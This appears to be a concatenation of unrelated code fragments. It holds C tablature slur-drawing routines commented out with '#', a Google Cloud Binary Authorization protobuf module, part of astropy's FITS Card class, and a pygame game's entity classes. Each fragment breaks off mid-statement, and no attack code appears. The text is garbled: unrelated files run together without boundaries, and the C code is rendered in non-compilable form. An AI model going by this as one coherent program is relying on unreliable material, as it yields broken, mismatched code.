# if (to >= nsym) {
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# y2=y1;
# }
#
#
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
#
# #*************************************************************************
# * draw_tabchordslurs - draws slurs between specified chords
# * if to >= nsym, slurs are drawn till end of line
# * if from < 0, slurs are drawn from line beginning
# *************************************************************************
# void draw_tabchordslurs (int from, int to)
# {
# int m,m1,m2,hc1,hc2,cut;
# float x1,y1,x2,y2,direction,height,shift;
#
# #
# * slurs within one line
#
#
# if ((from>=0) && (to<nsym)) {
# m2=0;
# for (m1=0;m1<sym[from].npitch;m1++) {
# # ties
# if (sym[from].ti1[m1]) {
# sym[from].ti1[m1] = 0; #mark as done
# for (m=m2;m<sym[to].npitch;m++)
# if (sym[to].ti2[m]) {
# m2=m;
# sym[to].ti2[m] = 0; #mark as done
# break;
# }
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[from].sl1[m1]) {
# sym[from].sl1[m1] = 0; #mark as done
# for (m=m2;m<sym[to].npitch;m++)
# if (sym[to].sl2[m]) {
# m2=m;
# sym[to].sl2[m] = 0; #mark as done
# break;
# }
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
#
#
# #
# * special treatment for slurs across line breaks
#
#
# #slur start in previous line
# if (from<0) {
# for (m2=0;m2<sym[to].npitch;m2++) {
# # ties
# if (sym[to].ti2[m2]) {
# sym[to].ti2[m2] = 0; #mark as done
# # get positions for slur
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# hc1 = hc2;
# y1 = y2;
# # extra space if next course in chords used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[to].sl2[m2]) {
# sym[to].sl2[m2] = 0; #mark as done
# # get positions for slur
# x2 = sym[to].x;
# hc2 = tabline(sym[to].pits[m2]);
# y2 = (6-hc2) * tabfont.size;
# cut=prev_scut(to);
# x1=sym[cut].x;
# if (cut==to) x1-=30;
# hc1 = hc2;
# y1 = y2;
# # extra space if next course in chords used
# if ((sym[to].npitch > 1) && (next_line(&sym[to],hc2) == hc2+1))
# x2 -= 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
#
# # slur end in next line
# if (to>=nsym) {
# for (m1=0;m1<sym[from].npitch;m1++) {
# # ties
# if (sym[from].ti1[m1]) {
# sym[from].ti1[m1] = 0; #mark as done
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# hc2 = hc1;
# y2 = y1;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# # slurs
# if (sym[from].sl1[m1]) {
# sym[from].sl1[m1] = 0; #mark as done
# # get positions for slur
# x1 = sym[from].x;
# hc1 = tabline(sym[from].pits[m1]);
# y1 = (6-hc1) * tabfont.size;
# cut=next_scut(from);
# x2=sym[cut].x;
# if (cut==from) x2+=30;
# hc2 = hc1;
# y2 = y1;
# # extra space if next course in chords used
# if ((sym[from].npitch > 1) && (next_line(&sym[from],hc1) == hc1+1))
# x1 += 0.5 * tabfont.size;
# direction = -1;
# shift = -2 - tab_slurshift();
# #height=direction*(0.04*(x2-x1)+5);
# height = direction * tabfont.size;
# output_slur (x1,y1,x2,y2,direction,height,shift);
# }
# }
# }
# }
#
# #*************************************************************************
# * tab_slurshift - return vertical shift for tablature slurs
# * in current voice. A return value > 0 means a shift towards
# * the next higher course
# *************************************************************************
# float tab_slurshift()
# {
# if (voice[ivc].key.ktype==FRENCHTAB ||
# voice[ivc].key.ktype==FRENCH5TAB ||
# voice[ivc].key.ktype==FRENCH4TAB)
# return 0.0;
# else #italiantab or spanishtab
# return 0.25 * tabfont.size;
# }
#
# #*************************************************************************
# * draw_tabtenutos - draw all tenuto strokes in current line
# *************************************************************************
# void draw_tabtenutos (void)
# {
# int i,m,m1,m2,from,to,hc1,hc2;
# float x1,y1,x2,y2;
#
# from=to=-1;
# for (i=0;i<nsym;i++) {
# # find start and end of tenuto sign
# if (sym[i].type==NOTE && sym[i].ten_st) {
# from=i;
# while (!sym[i].ten_end &&
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.cloud.binaryauthorization.v1',
manifest={
'Policy',
'AdmissionWhitelistPattern',
'AdmissionRule',
'Attestor',
'UserOwnedGrafeasNote',
'PkixPublicKey',
'AttestorPublicKey',
},
)
class Policy(proto.Message):
r"""A [policy][google.cloud.binaryauthorization.v1.Policy] for container
image binary authorization.
Attributes:
name (str):
Output only. The resource name, in the format
``projects/*/policy``. There is at most one policy per
project.
description (str):
Optional. A descriptive comment.
global_policy_evaluation_mode (google.cloud.binaryauthorization_v1.types.Policy.GlobalPolicyEvaluationMode):
Optional. Controls the evaluation of a
Google-maintained global admission policy for
common system-level images. Images not covered
by the global policy will be subject to the
project admission policy. This setting has no
effect when specified inside a global admission
policy.
admission_whitelist_patterns (Sequence[google.cloud.binaryauthorization_v1.types.AdmissionWhitelistPattern]):
Optional. Admission policy allowlisting. A
matching admission request will always be
permitted. This feature is typically used to
exclude Google or third-party infrastructure
images from Binary Authorization policies.
cluster_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.ClusterAdmissionRulesEntry]):
Optional. Per-cluster admission rules. Cluster spec format:
``location.clusterId``. There can be at most one admission
rule per cluster spec. A ``location`` is either a compute
zone (e.g. us-central1-a) or a region (e.g. us-central1).
For ``clusterId`` syntax restrictions see
https://cloud.google.com/container-engine/reference/rest/v1/projects.zones.clusters.
kubernetes_namespace_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.KubernetesNamespaceAdmissionRulesEntry]):
Optional. Per-kubernetes-namespace admission rules. K8s
namespace spec format: [a-z.-]+, e.g. 'some-namespace'
kubernetes_service_account_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.KubernetesServiceAccountAdmissionRulesEntry]):
Optional. Per-kubernetes-service-account admission rules.
Service account spec format: ``namespace:serviceaccount``.
e.g. 'test-ns:default'
istio_service_identity_admission_rules (Sequence[google.cloud.binaryauthorization_v1.types.Policy.IstioServiceIdentityAdmissionRulesEntry]):
Optional. Per-istio-service-identity
admission rules. Istio service identity spec
format:
spiffe://<domain>/ns/<namespace>/sa/<serviceaccount>
or <domain>/ns/<namespace>/sa/<serviceaccount>
e.g. spiffe://example.com/ns/test-ns/sa/default
default_admission_rule (google.cloud.binaryauthorization_v1.types.AdmissionRule):
Required. Default admission rule for a
cluster without a per-cluster, per- kubernetes-
service-account, or per-istio-service-identity
admission rule.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time when the policy was last
updated.
"""
class GlobalPolicyEvaluationMode(proto.Enum):
r""""""
GLOBAL_POLICY_EVALUATION_MODE_UNSPECIFIED = 0
ENABLE = 1
DISABLE = 2
name = proto.Field(
proto.STRING,
number=1,
)
description = proto.Field(
proto.STRING,
number=6,
)
global_policy_evaluation_mode = proto.Field(
proto.ENUM,
number=7,
enum=GlobalPolicyEvaluationMode,
)
admission_whitelist_patterns = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='AdmissionWhitelistPattern',
)
cluster_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=3,
message='AdmissionRule',
)
kubernetes_namespace_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=10,
message='AdmissionRule',
)
kubernetes_service_account_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=8,
message='AdmissionRule',
)
istio_service_identity_admission_rules = proto.MapField(
proto.STRING,
proto.MESSAGE,
number=9,
message='AdmissionRule',
)
default_admission_rule = proto.Field(
proto.MESSAGE,
number=4,
message='AdmissionRule',
)
update_time = proto.Field(
proto.MESSAGE,
number=5,
message=timestamp_pb2.Timestamp,
)
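# A minimal construction sketch for the message above (project, cluster spec and attestor
# names are placeholders, not taken from the source):
#   policy = Policy(
#       default_admission_rule=AdmissionRule(
#           evaluation_mode=AdmissionRule.EvaluationMode.ALWAYS_ALLOW,
#           enforcement_mode=AdmissionRule.EnforcementMode.DRYRUN_AUDIT_LOG_ONLY,
#       ),
#       cluster_admission_rules={
#           'us-central1-a.prod-cluster': AdmissionRule(
#               evaluation_mode=AdmissionRule.EvaluationMode.REQUIRE_ATTESTATION,
#               require_attestations_by=['projects/my-project/attestors/my-attestor'],
#               enforcement_mode=AdmissionRule.EnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,
#           ),
#       },
#   )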
class AdmissionWhitelistPattern(proto.Message):
r"""An [admission allowlist
pattern][google.cloud.binaryauthorization.v1.AdmissionWhitelistPattern]
exempts images from checks by [admission
rules][google.cloud.binaryauthorization.v1.AdmissionRule].
Attributes:
name_pattern (str):
An image name pattern to allowlist, in the form
``registry/path/to/image``. This supports a trailing ``*``
wildcard, but this is allowed only in text after the
``registry/`` part. This also supports a trailing ``**``
wildcard which matches subdirectories of a given entry.
"""
name_pattern = proto.Field(
proto.STRING,
number=1,
)
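# Illustrative patterns (not taken from the source): 'gcr.io/my-project/*' allowlists images
# directly under that path, while 'gcr.io/my-project/**' also matches images in
# subdirectories, per the trailing-wildcard rules described in the docstring above.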
class AdmissionRule(proto.Message):
r"""An [admission
rule][google.cloud.binaryauthorization.v1.AdmissionRule] specifies
either that all container images used in a pod creation request must
be attested to by one or more
[attestors][google.cloud.binaryauthorization.v1.Attestor], that all
pod creations will be allowed, or that all pod creations will be
denied.
Images matching an [admission allowlist
pattern][google.cloud.binaryauthorization.v1.AdmissionWhitelistPattern]
are exempted from admission rules and will never block a pod
creation.
Attributes:
evaluation_mode (google.cloud.binaryauthorization_v1.types.AdmissionRule.EvaluationMode):
Required. How this admission rule will be
evaluated.
require_attestations_by (Sequence[str]):
Optional. The resource names of the attestors that must
attest to a container image, in the format
``projects/*/attestors/*``. Each attestor must exist before
a policy can reference it. To add an attestor to a policy
the principal issuing the policy change request must be able
to read the attestor resource.
Note: this field must be non-empty when the evaluation_mode
field specifies REQUIRE_ATTESTATION, otherwise it must be
empty.
enforcement_mode (google.cloud.binaryauthorization_v1.types.AdmissionRule.EnforcementMode):
Required. The action when a pod creation is
denied by the admission rule.
"""
class EvaluationMode(proto.Enum):
r""""""
EVALUATION_MODE_UNSPECIFIED = 0
ALWAYS_ALLOW = 1
REQUIRE_ATTESTATION = 2
ALWAYS_DENY = 3
class EnforcementMode(proto.Enum):
r"""Defines the possible actions when a pod creation is denied by
an admission rule.
"""
ENFORCEMENT_MODE_UNSPECIFIED = 0
ENFORCED_BLOCK_AND_AUDIT_LOG = 1
DRYRUN_AUDIT_LOG_ONLY = 2
evaluation_mode = proto.Field(
proto.ENUM,
number=1,
enum=EvaluationMode,
)
require_attestations_by = proto.RepeatedField(
proto.STRING,
number=2,
)
enforcement_mode = proto.Field(
proto.ENUM,
number=3,
enum=EnforcementMode,
)
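# A minimal construction sketch for AdmissionRule (resource names are placeholders):
#   rule = AdmissionRule(
#       evaluation_mode=AdmissionRule.EvaluationMode.REQUIRE_ATTESTATION,
#       require_attestations_by=['projects/my-project/attestors/my-attestor'],
#       enforcement_mode=AdmissionRule.EnforcementMode.ENFORCED_BLOCK_AND_AUDIT_LOG,
#   )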
class Attestor(proto.Message):
r"""An [attestor][google.cloud.binaryauthorization.v1.Attestor] that
attests to container image artifacts. An existing attestor cannot be
modified except where indicated.
Attributes:
name (str):
Required. The resource name, in the format:
``projects/*/attestors/*``. This field may not be updated.
description (str):
Optional. A descriptive comment. This field
may be updated. The field may be displayed in
chooser dialogs.
user_owned_grafeas_note (google.cloud.binaryauthorization_v1.types.UserOwnedGrafeasNote):
This specifies how an attestation will be
read, and how it will be used during policy
enforcement.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time when the attestor was last
updated.
"""
name = proto.Field(
proto.STRING,
number=1,
)
description = proto.Field(
proto.STRING,
number=6,
)
user_owned_grafeas_note = proto.Field(
proto.MESSAGE,
number=3,
oneof='attestor_type',
message='UserOwnedGrafeasNote',
)
update_time = proto.Field(
proto.MESSAGE,
number=4,
message=timestamp_pb2.Timestamp,
)
class UserOwnedGrafeasNote(proto.Message):
r"""An [user owned Grafeas
note][google.cloud.binaryauthorization.v1.UserOwnedGrafeasNote]
references a Grafeas Attestation.Authority Note created by the user.
Attributes:
note_reference (str):
Required. The Grafeas resource name of a
Attestation.Authority Note, created by the user, in the
format: ``projects/*/notes/*``. This field may not be
updated.
An attestation by this attestor is stored as a Grafeas
Attestation.Authority Occurrence that names a container
image and that links to this Note. Grafeas is an external
dependency.
public_keys (Sequence[google.cloud.binaryauthorization_v1.types.AttestorPublicKey]):
Optional. Public keys that verify
attestations signed by this attestor. This
field may be updated.
If this field is non-empty, one of the specified
public keys must verify that an attestation was
signed by this attestor for the image specified
in the admission request.
If this field is empty, this attestor always
returns that no valid attestations exist.
delegation_service_account_email (str):
Output only. This field will contain the service account
email address that this Attestor will use as the principal
when querying Container Analysis. Attestor administrators
must grant this service account the IAM role needed to read
attestations from the [note_reference][Note] in Container
Analysis (``containeranalysis.notes.occurrences.viewer``).
This email address is fixed for the lifetime of the
Attestor, but callers should not make any other assumptions
about the service account email; future versions may use an
email based on a different naming pattern.
"""
note_reference = proto.Field(
proto.STRING,
number=1,
)
public_keys = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='AttestorPublicKey',
)
delegation_service_account_email = proto.Field(
proto.STRING,
number=3,
)
class PkixPublicKey(proto.Message):
r"""A public key in the PkixPublicKey format (see
https://tools.ietf.org/html/rfc5280#section-4.1.2.7 for
details). Public keys of this type are typically textually
encoded using the PEM format.
Attributes:
public_key_pem (str):
A PEM-encoded public key, as described in
https://tools.ietf.org/html/rfc7468#section-13
signature_algorithm (google.cloud.binaryauthorization_v1.types.PkixPublicKey.SignatureAlgorithm):
The signature algorithm used to verify a message against a
            signature using this key. This signature algorithm must
match the structure and any object identifiers encoded in
``public_key_pem`` (i.e. this algorithm must match that of
the public key).
"""
class SignatureAlgorithm(proto.Enum):
r"""Represents a signature algorithm and other information
necessary to verify signatures with a given public key. This is
based primarily on the public key types supported by Tink's
PemKeyType, which is in turn based on KMS's supported signing
algorithms. See https://cloud.google.com/kms/docs/algorithms. In
the future, BinAuthz might support additional public key types
independently of Tink and/or KMS.
"""
_pb_options = {'allow_alias': True}
SIGNATURE_ALGORITHM_UNSPECIFIED = 0
RSA_PSS_2048_SHA256 = 1
RSA_PSS_3072_SHA256 = 2
RSA_PSS_4096_SHA256 = 3
RSA_PSS_4096_SHA512 = 4
RSA_SIGN_PKCS1_2048_SHA256 = 5
RSA_SIGN_PKCS1_3072_SHA256 = 6
RSA_SIGN_PKCS1_4096_SHA256 = 7
RSA_SIGN_PKCS1_4096_SHA512 = 8
ECDSA_P256_SHA256 = 9
EC_SIGN_P256_SHA256 = 9
ECDSA_P384_SHA384 = 10
EC_SIGN_P384_SHA384 = 10
ECDSA_P521_SHA512 = 11
EC_SIGN_P521_SHA512 = 11
public_key_pem = proto.Field(
proto.STRING,
number=1,
)
signature_algorithm = proto.Field(
proto.ENUM,
number=2,
enum=SignatureAlgorithm,
)
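# A minimal construction sketch for PkixPublicKey (the PEM body is a placeholder, not a real key):
#   key = PkixPublicKey(
#       public_key_pem='-----BEGIN PUBLIC KEY-----\nMFkw...IDAQAB\n-----END PUBLIC KEY-----\n',
#       signature_algorithm=PkixPublicKey.SignatureAlgorithm.ECDSA_P256_SHA256,
#   )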
class AttestorPublicKey(proto.Message):
r"""An [attestor public
key][google.cloud.binaryauthorization.v1.AttestorPublicKey] that
will be used to verify attestations signed by this attestor.
Attributes:
comment (str):
Optional. A descriptive comment. This field
may be updated.
id (str):
The ID of this public key. Signatures verified by BinAuthz
            must include the ID of the public
<reponame>xiaomi1122/astropy
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import copy
import re
import warnings
import numpy as np
from .util import _str_to_num, _is_int, maketrans, translate, _words_group
from .verify import _Verify, _ErrList, VerifyError, VerifyWarning
from . import ENABLE_RECORD_VALUED_KEYWORD_CARDS, STRIP_HEADER_WHITESPACE
from ...extern.six import string_types
from ...utils import deprecated
from ...utils.exceptions import AstropyUserWarning, AstropyDeprecationWarning
__all__ = ['Card', 'CardList', 'create_card', 'create_card_from_string',
'upper_key', 'Undefined']
FIX_FP_TABLE = maketrans('de', 'DE')
FIX_FP_TABLE2 = maketrans('dD', 'eE')
CARD_LENGTH = 80
BLANK_CARD = ' ' * CARD_LENGTH
KEYWORD_LENGTH = 8 # The max length for FITS-standard keywords
VALUE_INDICATOR = '= ' # The standard FITS value indicator
HIERARCH_VALUE_INDICATOR = '=' # HIERARCH cards may use a shortened indicator
class Undefined(object):
"""Undefined value."""
def __init__(self):
# This __init__ is required to be here for Sphinx documentation
pass
UNDEFINED = Undefined()
class CardList(list):
"""
.. deprecated:: 0.1
`CardList` used to provide the list-like functionality for manipulating
a header as a list of cards. This functionality is now subsumed into
the `Header` class itself, so it is no longer necessary to create or
use `CardList`\s.
"""
def __init__(self, cards=[], keylist=None):
"""
Construct the `CardList` object from a list of `Card` objects.
`CardList` is now merely a thin wrapper around `Header` to provide
backwards compatibility for the old API. This should not be used for
any new code.
Parameters
----------
cards
A list of `Card` objects.
"""
warnings.warn(
'The CardList class has been deprecated; all its former '
'functionality has been subsumed by the Header class, so '
'CardList objects should not be directly created. See the '
'PyFITS 3.1.0 CHANGELOG for more details.',
AstropyDeprecationWarning)
# This is necessary for now to prevent a circular import
from .header import Header
        # I'm not sure if the keylist argument here was ever really useful;
# I'm going to just say don't use it.
if keylist is not None:
raise ValueError(
'The keylist argument to CardList() is no longer supported.')
if isinstance(cards, Header):
self._header = cards
else:
self._header = Header(cards)
super(CardList, self).__init__(self._header.cards)
def __contains__(self, key):
return key in self._header
def __iter__(self):
return iter(self._header.cards)
def __getitem__(self, key):
"""Get a `Card` by indexing or by the keyword name."""
if self._header._haswildcard(key):
return [copy.copy(self._header._cards[idx])
for idx in self._header._wildcardmatch(key)]
elif isinstance(key, slice):
return CardList(self._header.cards[key])
idx = self._header._cardindex(key)
return self._header.cards[idx]
def __setitem__(self, key, value):
"""Set a `Card` by indexing or by the keyword name."""
if isinstance(value, tuple) and (1 < len(value) <= 3):
value = Card(*value)
if isinstance(value, Card):
idx = self._header._cardindex(key)
card = self._header.cards[idx]
if str(card) != str(value):
# Replace the existing card at this index by delete/insert
del self._header[idx]
self._header.insert(idx, value)
else:
raise ValueError('%s is not a Card' % str(value))
def __delitem__(self, key):
"""Delete a `Card` from the `CardList`."""
if key not in self._header._keyword_indices:
raise KeyError("Keyword '%s' not found." % key)
del self._header[key]
def __getslice__(self, start, end):
return CardList(self[slice(start, end)])
def __repr__(self):
"""Format a list of cards into a string."""
return str(self._header)
def __str__(self):
"""Format a list of cards into a printable string."""
return '\n'.join(str(card) for card in self)
@deprecated('0.1', alternative=':meth:`Header.copy`', pending=False)
def copy(self):
"""Make a (deep)copy of the `CardList`."""
return CardList(self._header.copy())
@deprecated('0.1', alternative=':meth:`Header.keys`', pending=False)
def keys(self):
"""
Return a list of all keywords from the `CardList`.
"""
return self._header.keys()
@deprecated('0.1', alternative=':meth:`Header.values`', pending=False)
def values(self):
"""
Return a list of the values of all cards in the `CardList`.
For ``RecordValuedKeywordCard`` objects, the value returned is
the floating point value, exclusive of the
``field_specifier``.
"""
return self._header.values()
@deprecated('0.1', alternative=':meth:`Header.append`', pending=False)
def append(self, card, useblanks=True, bottom=False):
"""
Append a `Card` to the `CardList`.
Parameters
----------
card : `Card` object
The `Card` to be appended.
useblanks : bool, optional
Use any *extra* blank cards?
If ``useblanks`` is `True`, and if there are blank cards directly
before ``END``, it will use this space first, instead of appending
after these blank cards, so the total space will not increase.
When ``useblanks`` is `False`, the card will be appended at the
end, even if there are blank cards in front of ``END``.
bottom : bool, optional
If `False` the card will be appended after the last non-commentary
card. If `True` the card will be appended after the last non-blank
card.
"""
self._header.append(card, useblanks=useblanks, bottom=bottom)
@deprecated('0.1', alternative=':meth:`Header.extend`', pending=False)
def extend(self, cards):
self._header.extend(cards)
@deprecated('0.1', alternative=':meth:`Header.insert`', pending=False)
def insert(self, idx, card, useblanks=True):
"""
Insert a `Card` to the `CardList`.
Parameters
----------
pos : int
The position (index, keyword name will not be allowed) to
insert. The new card will be inserted before it.
card : `Card` object
The card to be inserted.
useblanks : bool, optional
If ``useblanks`` is `True`, and if there are blank cards directly
before ``END``, it will use this space first, instead of appending
after these blank cards, so the total space will not increase.
When `useblanks` is `False`, the card will be appended at the end,
even if there are blank cards in front of ``END``.
"""
self._header.insert(idx, card, useblanks=useblanks)
@deprecated('0.1', alternative=':meth:`Header.remove`')
def remove(self, card):
del self._header[self.index(card)]
@deprecated('0.1', alternative=':meth:`Header.pop`')
def pop(self, index=-1):
return self._header.pop(index)
@deprecated('0.1', alternative=':meth:`Header.index`')
def index(self, card):
return self._header._cards.index(card)
@deprecated('0.1', alternative=':meth:`Header.count`')
def count(self, card):
return self._header._cards.count(card)
@deprecated('0.1', alternative=':meth:`Header.index`', pending=False)
def index_of(self, key, backward=False):
"""
Get the index of a keyword in the `CardList`.
Parameters
----------
key : str or int
The keyword name (a string) or the index (an integer).
backward : bool, optional
When `True`, search the index from the ``END``, i.e.,
backward.
Returns
-------
index : int
The index of the `Card` with the given keyword.
"""
# Backward is just ignored now, since the search is not linear anyways
        if _is_int(key) or isinstance(key, string_types):
return self._header._cardindex(key)
else:
raise KeyError('Illegal key data type %s' % type(key))
@deprecated('0.1', alternative='``header[<wildcard_pattern>]``')
def filter_list(self, key):
"""
Construct a `CardList` that contains references to all of the cards in
this `CardList` that match the input key value including any special
filter keys (``*``, ``?``, and ``...``).
Parameters
----------
key : str
key value to filter the list with
Returns
-------
cardlist
A `CardList` object containing references to all the
requested cards.
"""
return CardList(self._header[key])
@deprecated('0.1', pending=False)
def count_blanks(self):
"""
Returns how many blank cards are *directly* before the ``END``
card.
"""
return self._header._countblanks()
class Card(_Verify):
length = CARD_LENGTH
"""The length of a Card image; should always be 80 for valid FITS files."""
# String for a FITS standard compliant (FSC) keyword.
_keywd_FSC_RE = re.compile(r'^[A-Z0-9_-]{0,%d}$' % KEYWORD_LENGTH)
# This will match any printable ASCII character excluding '='
_keywd_hierarch_RE = re.compile(r'^(?:HIERARCH +)?(?:^[ -<>-~]+ ?)+$',
re.I)
# A number sub-string, either an integer or a float in fixed or
# scientific notation. One for FSC and one for non-FSC (NFSC) format:
# NFSC allows lower case of DE for exponent, allows space between sign,
# digits, exponent sign, and exponents
_digits_FSC = r'(\.\d+|\d+(\.\d*)?)([DE][+-]?\d+)?'
_digits_NFSC = r'(\.\d+|\d+(\.\d*)?) *([deDE] *[+-]? *\d+)?'
_numr_FSC = r'[+-]?' + _digits_FSC
_numr_NFSC = r'[+-]? *' + _digits_NFSC
# This regex helps delete leading zeros from numbers, otherwise
# Python might evaluate them as octal values (this is not-greedy, however,
# so it may not strip leading zeros from a float, which is fine)
_number_FSC_RE = re.compile(r'(?P<sign>[+-])?0*?(?P<digt>%s)'
% _digits_FSC)
_number_NFSC_RE = re.compile(r'(?P<sign>[+-])? *0*?(?P<digt>%s)'
% _digits_NFSC)
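    # For illustration (examples not from the source): '1.23E+04' satisfies the fixed-format
    # (FSC) number pattern, while '1.23e + 04' (lower-case exponent with embedded spaces) is
    # only accepted by the more lenient NFSC pattern above.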
# FSC commentary card string which must contain printable ASCII characters.
_ascii_text = r'[ -~]*$'
_comment_FSC_RE = re.compile(_ascii_text)
# Checks for a valid value/comment string. It returns a match object
# for a valid value/comment string.
# The valu group will return a match if a FITS string, boolean,
# number, or complex value is found, otherwise it will return
# None, meaning the keyword is undefined. The comment field will
# return a match if the comment separator is found, though the
# comment maybe an empty string.
_value_FSC_RE = re.compile(
r'(?P<valu_field> *'
r'(?P<valu>'
# The <strg> regex is not correct for all cases, but
# it comes pretty darn close. It appears to find the
# end of a string rather well, but will accept
# strings with an odd number of single quotes,
# instead of issuing an | |
<filename>Entities.py
import pygame, os, time
from Stage import *
from Sprites import *
from random import randint
class PlayerPlane:
def __init__(self, x, y):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "player.png"))
self.x = x
self.y = y
self.fuel = 3000
self.bombs = 30
self.score = 0
self.lives = 0
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.name = []
self.vertspeed = 0
self.DiedOnFrame = 0
#Flags
self.ControlsEnabled = True
self.IsRespawning = False
self.IsInvincible = False
        #Hitbox with respect to lasers
self.hitbox = pygame.Rect((0,0), (50,20))
self.hitbox.center = self.rect.center
        #Respawn values:
self.RespawnDuration = 150
self.InvincibilityDuration = 210
def Die(self, frame):
self.lives -= 1
self.fuel = 3000
self.bombs = 30
self.x = -380
self.y = int(height/2)
self.ControlsEnabled = False
self.IsRespawning = True
self.IsInvincible = True
self.DiedOnFrame = frame
Player = PlayerPlane(-100, int(height/2))
Bullets = []
EnemyBullets = []
class Bullet:
def __init__(self, x, y, horizspeed, vertspeed, firedby):
self.sprite = laser
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.horizspeed = horizspeed
self.vertspeed = vertspeed
self.firedby = firedby
EnemyBalloons = []
class WeatherBalloon:
    #<NAME> WHAT IS THIS THING? They look like floating mines that are lighter than air
def __init__(self, x, y, horizspeed):
self.sprite = balloon
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.vertspeed = -1
self.horizspeed = horizspeed
self.maxvertspeed = randint(-5, -1)
self.firedby = "Enemy"
Bombs = []
EnemyBombs = []
class PlayerBombs:
def __init__(self, x, y, frame):
self.sprite = bomb
self.sprite = pygame.transform.scale(self.sprite, ((30,10)))
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
self.droppedOnFrame = frame
class EnemyBomb:
def __init__(self, x, y, frame):
self.sprite = bomb
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.sprite = pygame.transform.scale(self.sprite, ((30,10)))
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
self.droppedOnFrame = frame
class ResupplyPlane:
def __init__(self):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "friendlyplane.png"))
self.x = -100
self.y = 50
self.WhereToDrop = 0
Friendlies = [ResupplyPlane()]
class CarePackage:
def __init__(self, x, y, vertspeed, sprite, points):
self.x = x
self.y = y
self.vertspeed = 2
self.sprite = sprite
self.rect = self.sprite.get_rect()
self.pointsawarded = points
Enemies = []
class EnemyPlane:
def __init__(self, y, frame):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "enemytest.png"))
self.rect = self.sprite.get_rect()
self.x = width + 100
self.y = y
self.horizspeed = -5
self.vertspeed = 0
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
self.FireOnFrame = frame + randint(60, 120)
self.hitpoints = 1
self.name = "Enemy"
def Behave(self, frame):
if self.x <= -100:
